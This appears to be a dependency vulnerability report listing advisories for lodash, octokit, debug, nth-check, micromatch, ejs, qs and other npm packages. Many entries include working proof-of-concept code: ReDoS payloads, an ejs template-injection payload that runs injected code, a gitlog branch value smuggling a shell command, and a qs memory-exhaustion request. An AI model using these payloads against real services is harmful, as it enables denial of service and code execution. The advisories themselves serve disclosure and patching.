All vulnerabilities affecting version 2.17.8 of the package
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.
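A minimal sketch of the pollution (assuming an affected lodash version; the property path and flag name are purely illustrative):
const _ = require("lodash");

// A user-supplied property path reaching zipObjectDeep...
_.zipObjectDeep(["__proto__.polluted"], [true]);

// ...lands on Object.prototype, so every object now appears to carry the property.
console.log({}.polluted); // true on affected versions, undefined once patched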
@octokit/request has a Regular Expression in fetchWrapper that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
The regular expression /<([^>]+)>; rel="deprecation"/ used to match the link header in HTTP responses is vulnerable to a ReDoS (Regular Expression Denial of Service) attack. This vulnerability arises due to the unbounded nature of the regex's matching behavior, which can lead to catastrophic backtracking when processing specially crafted input. An attacker could exploit this flaw by sending a malicious link header, resulting in excessive CPU usage and potentially causing the server to become unresponsive, impacting service availability.
In more detail, the pattern captures content between angle brackets (<>) followed by ; rel="deprecation", and is susceptible to catastrophic backtracking when processing malicious input.
An attacker can exploit this vulnerability by sending a specially crafted link header designed to trigger excessive backtracking. For example, the following headers:
fakeHeaders.set("link", "<".repeat(100000) + ">");
fakeHeaders.set("deprecation", "true");
The crafted link header consists of 100,000 consecutive < characters followed by a closing >. This input forces the regular expression engine to backtrack extensively in an attempt to match the pattern. As a result, the server can experience a significant increase in CPU usage, which may lead to denial of service, making the server unresponsive or even causing it to crash under load.
The issue is present in the following code:
const matches = responseHeaders.link && responseHeaders.link.match(/<([^>]+)>; rel="deprecation"/);
In this scenario, the link header value triggers the regex to perform excessive backtracking, resulting in resource exhaustion and potentially causing the service to become unavailable.
import { request } from "@octokit/request";

// Monkey-patch fetch so every response carries a malicious `link` header.
const originalFetch = globalThis.fetch;
globalThis.fetch = async (url, options) => {
  const response = await originalFetch(url, options);
  const fakeHeaders = new Headers(response.headers);
  // 100,000 "<" characters followed by a single ">" force the deprecation
  // regex into extensive backtracking.
  fakeHeaders.set("link", "<".repeat(100000) + ">");
  fakeHeaders.set("deprecation", "true");
  return new Response(response.body, {
    status: response.status,
    statusText: response.statusText,
    headers: fakeHeaders
  });
};

// Any request now spends excessive CPU in fetchWrapper while the crafted
// link header is matched.
request("GET /repos/octocat/hello-world")
  .then(response => {
    // console.log("[+] Response received:", response);
  })
  .catch(error => {
    // console.error("[-] Error:", error);
  });

// Restore the original fetch when finished:
// globalThis.fetch = originalFetch;
This is a Denial of Service (DoS) vulnerability caused by a ReDoS (Regular Expression Denial of Service) flaw. The vulnerability allows an attacker to craft a malicious link header that exploits the inefficient backtracking behavior of the regular expression used in the code.
The primary impact is the potential for server resource exhaustion, specifically high CPU usage, which can cause the server to become unresponsive or even crash when processing the malicious request. This affects the availability of the service, leading to downtime or degraded performance.
The vulnerability impacts any system that uses this specific regular expression to process link headers in HTTP responses. Because the attacker only needs to control the content of the link header, this is a low-barrier attack that could be exploited by anyone.
@octokit/request-error has a Regular Expression in index that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the processing of HTTP request headers. By sending an authorization header containing an excessively long sequence of spaces followed by a newline and "@", an attacker can exploit inefficient regular expression processing, leading to excessive resource consumption. This can significantly degrade server performance or cause a denial-of-service (DoS) condition, impacting availability.
The issue occurs at line 52 of index.ts in the @octokit/request-error repository.
The vulnerability is caused by the use of an inefficient regular expression in the handling of the authorization header within the request processing logic:
authorization: options.request.headers.authorization.replace(
  / .*$/,
  " [REDACTED]"
)
The regular expression / .*$/ matches a space followed by any number of characters until the end of the line. This pattern is vulnerable to Regular Expression Denial of Service (ReDoS) when processing specially crafted input. Specifically, an attacker can send an authorization header containing a long sequence of spaces followed by a newline and "@", such as:
headers: {
  authorization: "" + " ".repeat(100000) + "\n@",
}
Due to the way JavaScript's regular expression engine backtracks while attempting to match the space followed by arbitrary characters, this input can cause excessive CPU usage, significantly slowing down or even freezing the server. This leads to a denial-of-service condition, impacting availability.
import { RequestError } from "@octokit/request-error";

// The authorization header below (100,000 spaces, a newline, then "@")
// triggers heavy backtracking in the / .*$/ redaction regex.
const error = new RequestError("Oops", 500, {
  request: {
    method: "POST",
    url: "https://api.github.com/foo",
    body: {
      bar: "baz",
    },
    headers: {
      authorization: "" + " ".repeat(100000) + "\n@",
    },
  },
  response: {
    status: 500,
    url: "https://api.github.com/foo",
    headers: {
      "x-github-request-id": "1:2:3:4",
    },
    data: {
      foo: "bar",
    },
  },
});
This is a Regular Expression Denial of Service (ReDoS) vulnerability, which occurs due to an inefficient regular expression (/ .*$/) used to sanitize the authorization header. An attacker can craft a malicious input that triggers excessive backtracking in the regex engine, leading to high CPU consumption and potential denial-of-service (DoS).
Any application or service that uses this library and sanitizes authorization headers in this way is at risk, especially those processing a large volume of authentication requests.
Regular Expression Denial of Service in debug
Affected versions of debug are vulnerable to regular expression denial of service when untrusted user input is passed into the %o formatter.
Because roughly 50,000 characters are needed to block the event loop for 2 seconds, this is considered a low-severity issue.
The flaw was later re-introduced in v3.2.0 and patched again in versions 3.2.7 and 4.3.1.
Version 2.x.x: Update to version 2.6.9 or later. Version 3.1.x: Update to version 3.1.0 or later. Version 3.2.x: Update to version 3.2.7 or later. Version 4.x.x: Update to version 4.3.1 or later.
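A minimal sketch of the quadratic behaviour described above (assuming an affected version; the whitespace-collapsing regex that the pre-patch %o formatter applied to the inspected value is reproduced here directly for illustration):
// Roughly 50,000 whitespace characters with no "\n": at each starting position
// the regex consumes the remaining run of spaces looking for a newline, fails,
// and retries, giving O(n^2) work overall.
const payload = " ".repeat(50000);
console.time("whitespace collapse");
payload.replace(/\s*\n\s*/g, " ");
console.timeEnd("whitespace collapse");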
Regular Expression Denial of Service (ReDoS) in cross-spawn
Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase CPU usage and crash the program by supplying a very large, specially crafted string.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters that use PostCSS to parse external, untrusted CSS. An attacker can prepare CSS so that it contains parts PostCSS parses as a CSS comment; after processing, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.
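A minimal sketch (assuming an affected PostCSS version) that parses the advisory's example, plus one ordinary rule added for illustration, and prints the resulting nodes so the \r discrepancy can be inspected:
const postcss = require("postcss");

// The advisory's example: a "\r" inside a value, followed by what is meant to be a comment.
const css = "@font-face{ font:(\r/*);} body { color: red }";
try {
  const root = postcss.parse(css);
  // On affected versions, text intended as a comment can surface inside rule or
  // declaration nodes instead of a Comment node.
  root.walk(node => console.log(node.type, JSON.stringify(node.toString())));
} catch (err) {
  console.log("parse error:", err.message);
}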
Command injection in gitlog
The gitlog function in src/index.ts in gitlog before 4.0.4 has a command injection vulnerability.
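A hypothetical illustration of the risk (the branch field, payload, and call shape are chosen for illustration only; assumes a 4.x gitlog version prior to 4.0.4, where option values reached a shell command):
const gitlog = require("gitlog").default;

// An attacker-controlled value carrying shell metacharacters.
const userControlledBranch = "main; touch /tmp/gitlog-injection";

gitlog(
  { repo: ".", branch: userControlledBranch, number: 1 },
  (error, commits) => console.log(error ? String(error) : commits)
);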
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS in the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))?, whose adjacent quantified parts overlap, and it can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check");
for (var i = 1; i <= 50000; i++) {
  var time = Date.now();
  var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
  try {
    nthCheck.parse(attack_str);
  }
  catch (err) {
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
  }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
Regular Expression Denial of Service (ReDoS) in micromatch
The NPM package micromatch prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js, where the pattern .* greedily matches anything. With a malicious payload, the pattern matching keeps backtracking over the input while it fails to find a closing bracket. As the input size increases, processing time grows until the application hangs or slows down. An earlier fix was merged, but further testing showed the issue persisted until https://github.com/micromatch/micromatch/pull/266. The issue is mitigated by using a safe pattern that does not start backtracking the regular expression due to greedy matching.
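A rough sketch of the input shape the advisory describes (an opening brace that is never closed, followed by a long tail); whether and how severely it reproduces the slowdown depends on the micromatch version:
const micromatch = require("micromatch");

// Unclosed brace followed by a long run of characters, so the greedy ".*"
// keeps searching for a closing bracket that never appears.
const payload = "x{" + "a".repeat(50000);
console.time("micromatch.braces");
micromatch.braces(payload);
console.timeEnd("micromatch.braces");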
ejs lacks certain pollution protection
The ejs (aka Embedded JavaScript templates) package before 3.1.10 for Node.js lacks certain pollution protection.
ejs template injection vulnerability
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
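A self-contained sketch of the documented vector (the template contents, data shape, and injected payload are illustrative; assumes ejs 3.1.6, whose renderFile copies settings["view options"] from the data into its internal options):
const fs = require("fs");
const ejs = require("ejs");

// A throwaway template standing in for an application view.
fs.writeFileSync("demo.ejs", "<%= greeting %>");

// Data an application might forward wholesale (e.g. req.query via res.render()).
const attackerControlledData = {
  greeting: "hello",
  settings: {
    "view options": {
      // Treated as an internal option; its value is spliced into the compiled
      // template function, so the injected JavaScript runs when the template renders.
      outputFunctionName: "x; console.log('injected code ran'); var __tmp",
    },
  },
};

ejs.renderFile("demo.ejs", attackerControlledData, (err, html) => {
  console.log(err || html);
});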
qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion
The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.
The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).
Vulnerable code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
  obj = utils.combine([], leaf); // No arrayLimit check
}
Working code (lib/parse.js:175):
else if (index <= options.arrayLimit) { // Limit checked here
  obj = [];
  obj[index] = leaf;
}
The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.
Test 1 - Basic bypass:
npm install qs
const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length); // Output: 6 (should be max 5)
Test 2 - DoS demonstration:
const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length); // Output: 10000 (should be max 100)
Configuration: arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
Payload form: a[]=value (not indexed a[0]=value)
Impact: Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.
Attack scenario: a request such as
GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
handled with qs.parse(query, { arrayLimit: 100 }) still allocates every element despite the configured limit.
Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at lines 147-151, but it is not used in the bracket notation handler at line 159.
Current code (lib/parse.js:159-162):
if (root === '[]' && options.parseArrays) {
  obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
    ? []
    : utils.combine([], leaf); // No arrayLimit check
}
Fixed code:
if (root === '[]' && options.parseArrays) {
  // Use currentArrayLength already calculated at line 147-151
  if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
    throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
  }
  // If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
  if (currentArrayLength >= options.arrayLimit) {
    obj = options.plainObjects ? { __proto__: null } : {};
    obj[currentArrayLength] = leaf;
  } else {
    obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
      ? []
      : utils.combine([], leaf);
  }
}
This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).